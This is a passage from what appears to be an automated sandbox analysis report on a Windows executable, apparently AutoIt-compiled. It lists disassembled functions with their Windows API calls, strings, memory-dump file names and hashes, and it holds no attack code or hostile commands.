                                                                                                        Function 0046E1A6 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 231COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                                                        • API String ID: 0-1896584978
                                                                                                        • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                                                        • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                                                                                        • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                                                        • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                                                                                                        Function 004341E6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __wcsicoll$IconLoad
                                                                                                        • String ID: blank$info$question$stop$warning
                                                                                                        • API String ID: 2485277191-404129466
                                                                                                        • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                                        • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                                                                        • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                                        • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                                                                        Function 00454639 Relevance: 25.7, APIs: 17, Instructions: 199windowtimeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00454678
                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                                                                        • GetWindowRect.USER32(?,?), ref: 004546F5
                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00454765
                                                                                                        • GetDesktopWindow.USER32 ref: 0045476F
                                                                                                        • GetWindowRect.USER32(00000000), ref: 00454776
                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                                                                        • GetClientRect.USER32(?,?), ref: 004547D2
                                                                                                        • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                                                                        • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                        • String ID:
                                                                                                        • API String ID: 3869813825-0
                                                                                                        • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                                        • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                                                                        • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                                        • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                                                                        Function 004649A3 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 395COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _wcslen.LIBCMT ref: 00464B28
                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                                                                        • _wcslen.LIBCMT ref: 00464C28
                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                                                                        • _wcslen.LIBCMT ref: 00464CBA
                                                                                                        • _wcslen.LIBCMT ref: 00464CD0
                                                                                                        • _wcslen.LIBCMT ref: 00464CEF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _wcslen$Directory$CurrentSystem
                                                                                                        • String ID: D
                                                                                                        • API String ID: 1914653954-2746444292
                                                                                                        • Opcode ID: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                                                                        • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                                                                        • Opcode Fuzzy Hash: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                                                                        • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                                                                        Function 0045CD1E Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 215COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _wcsncpy.LIBCMT ref: 0045CE39
                                                                                                        • __wsplitpath.LIBCMT ref: 0045CE78
                                                                                                        • _wcscat.LIBCMT ref: 0045CE8B
                                                                                                        • _wcscat.LIBCMT ref: 0045CE9E
                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                                                                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                        • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                                                                        • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                                                                        • _wcscpy.LIBCMT ref: 0045CF61
                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                                                        • String ID: *.*
                                                                                                        • API String ID: 1153243558-438819550
                                                                                                        • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                                                        • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                                                                        • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                                                        • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                                                                        Function 0044B98C Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 80COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __wcsicoll
                                                                                                        • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                                                        • API String ID: 3832890014-4202584635
                                                                                                        • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                                                        • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                                                                        • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                                                        • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                                                                        Function 0046A07E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 253windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                                                                        • GetFocus.USER32 ref: 0046A0DD
                                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessagePost$CtrlFocus
                                                                                                        • String ID: 0
                                                                                                        • API String ID: 1534620443-4108050209
                                                                                                        • Opcode ID: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                                                                        • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                                                                        • Opcode Fuzzy Hash: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                                                                        • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                                                                        Function 004557E0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 220COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • DestroyWindow.USER32(?), ref: 004558E3
                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$CreateDestroy
                                                                                                        • String ID: ,$tooltips_class32
                                                                                                        • API String ID: 1109047481-3856767331
                                                                                                        • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                        • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                                                                        • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                        • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                                                                        Function 00468B0E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 207windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                                                                        • GetMenuItemCount.USER32(?), ref: 00468C45
                                                                                                        • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                                                                        • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                                                                        • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                                                                        • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                                                                        • GetMenuItemCount.USER32 ref: 00468CFD
                                                                                                        • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                                                                        • GetCursorPos.USER32(?), ref: 00468D3F
                                                                                                        • SetForegroundWindow.USER32(?), ref: 00468D49
                                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                                                                        • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                                                                        • String ID: 0
                                                                                                        • API String ID: 1441871840-4108050209
                                                                                                        • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                                                                        • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                                                                        • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                                                                        • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                                                                        Function 00460879 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                                        • __swprintf.LIBCMT ref: 00460915
                                                                                                        • __swprintf.LIBCMT ref: 0046092D
                                                                                                        • _wprintf.LIBCMT ref: 004609E1
                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                        • API String ID: 3631882475-2268648507
                                                                                                        • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                                        • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                                                                        • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                                        • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                                                                        Function 004716B8 Relevance: 22.7, APIs: 15, Instructions: 179windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                                                                        • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                                                                        • SendMessageW.USER32 ref: 00471740
                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                                                                        • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                                                                        • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                                                                        • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                                                                        • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                                                                        • SendMessageW.USER32 ref: 0047184F
                                                                                                        • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                                                                        • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                                                                        • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                                                                        • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                                                                        • String ID:
                                                                                                        • API String ID: 4116747274-0
                                                                                                        • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                                        • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                                                                        • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                                        • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                                                                        Function 0046163E Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                                                                        • _wcslen.LIBCMT ref: 00461683
                                                                                                        • __swprintf.LIBCMT ref: 00461721
                                                                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                                                                        • GetDlgCtrlID.USER32(?), ref: 00461869
                                                                                                        • GetWindowRect.USER32(?,?), ref: 004618A4
